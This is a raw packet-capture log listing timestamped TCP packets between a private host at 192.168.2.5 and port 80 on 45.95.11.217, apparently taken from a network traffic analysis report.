Apr 25, 2024 22:47:47.419506073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419527054 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.419559002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419569969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419599056 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.424431086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424444914 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424501896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.424545050 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424556971 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424602032 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.424642086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424653053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424674034 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.424714088 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424727917 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424746990 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.424787045 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424798965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.424818993 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.426399946 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.426456928 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.427709103 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.427721977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.427762032 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.428453922 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.428467035 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.428502083 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.429877043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.429889917 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.429929972 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.430191040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.430205107 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.430238008 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.430279016 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.430290937 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.430341959 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.430538893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.430552006 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.430596113 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.432782888 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.432795048 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.432830095 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.433209896 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.433222055 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.433240891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.433273077 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.645828962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.645848989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.645916939 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.645968914 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.645984888 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.646027088 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646032095 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.646039963 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646089077 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.646109104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646833897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646848917 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646872044 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646886110 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.646914959 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.646924019 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646934986 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646971941 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.646976948 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.646989107 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647027969 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.647130013 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647140980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647177935 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.647269011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647377014 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647392035 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647432089 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.647440910 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647453070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647475958 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.647711992 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647723913 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647758007 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.647792101 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647803068 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.647829056 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.648047924 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.648060083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.648087978 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.653667927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653691053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653702974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653753042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.653759003 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653783083 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.653824091 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653836966 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653856039 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653858900 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.653867960 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.653886080 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.655755043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.655769110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.655811071 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.658575058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.658642054 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.658658981 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.658669949 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.658710957 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.658899069 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.658910990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.658948898 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.659080029 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662012100 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662081957 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.662161112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662173033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662206888 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.662244081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662256002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662298918 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.662302017 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662313938 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662401915 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.662444115 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.664171934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.664235115 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.664484978 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.664777994 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.664791107 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.664803028 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.664829016 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.664855003 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.874766111 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.874805927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.874819040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.874830961 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.874928951 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.874941111 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875088930 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.875263929 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875278950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875308990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875319958 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875335932 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.875369072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.875389099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875401020 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875432014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.875467062 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875478983 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875511885 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.875801086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875813961 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.875852108 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.876127005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876141071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876177073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876178980 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.876188040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876221895 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.876282930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876296043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876324892 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.876715899 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876730919 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876769066 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.876807928 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876821041 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.876863003 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.877015114 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.877027988 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.877060890 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.882663012 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882694960 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882705927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882715940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882806063 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882805109 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.882818937 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882832050 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.882870913 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.883492947 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.883541107 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.890249968 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890271902 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890285015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890389919 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.890503883 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890516043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890562057 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890566111 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.890574932 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890597105 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.890775919 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.890815020 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.891715050 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891731977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891772985 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.891791105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891808987 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891823053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891840935 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.891860008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891880035 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891892910 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.891932011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891942978 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.891963005 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.893232107 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.893248081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.893292904 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.893812895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.893826008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.893855095 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.893951893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.893963099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.893990993 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107361078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107389927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107438087 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107450962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107528925 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107532978 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107546091 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107557058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107569933 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107589006 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107599974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107637882 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107650995 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107687950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107712984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107723951 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107724905 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107763052 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107871056 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107882977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107913971 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.107938051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107949018 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.107976913 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.108175039 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108227015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108259916 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.108285904 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108323097 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108359098 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.108401060 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108412027 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108458042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.108612061 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108680964 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108717918 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108719110 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.108778000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.108815908 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.109172106 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.109221935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.109280109 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.115849972 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.115888119 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.115900040 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.115926981 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.115993977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.116025925 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.116520882 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.116605997 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.116617918 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.116641998 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.116699934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.116739988 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.123790026 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.123881102 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.123908997 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.123922110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.123929024 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.123956919 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.123997927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.124010086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.124044895 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.124269009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.124388933 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.124428034 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.125634909 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.125689983 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.125873089 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.125885010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.125917912 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.125957966 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.125981092 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.125993967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.126025915 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.126029015 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.126065016 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.126883984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.126929045 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.126987934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127018929 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127028942 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.127074957 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.127123117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127161980 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.127590895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127628088 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.127671957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127685070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127716064 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.127729893 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.127733946 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.127767086 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340394020 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340425968 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340439081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340451002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340548992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340567112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340603113 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340635061 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340666056 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340706110 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340722084 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340734005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340756893 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340775967 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340776920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340791941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340821028 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340831041 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.340856075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340868950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.340917110 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:48.341361046 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341372967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:48.341382980 CEST	80	49706	45.95.11.217	192.168.2.5
